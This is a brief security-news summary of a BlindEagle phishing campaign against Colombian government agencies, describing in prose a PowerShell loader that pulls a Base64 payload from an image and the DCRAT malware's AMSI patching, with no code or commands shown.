BlindEagle Hackers Attacking Government Agencies with Powershell Scripts

BlindEagle, a South American threat group, has launched a sophisticated campaign against Colombian government agencies, demonstrating an alarming evolution in attack techniques. Remarkably, the phishing email was sent from a compromised account within the same organization, lending credibility to the message and bypassing conventional email security measures. The PowerShell command downloads an image file from the Internet Archive, extracts a Base64-encoded malicious payload hidden within it, and loads the payload directly into memory using .NET reflection. DCRAT includes advanced evasion capabilities, notably patching Microsoft’s Antimalware Scan Interface (AMSI) to disable detection mechanisms.

To read the complete article see: Full Article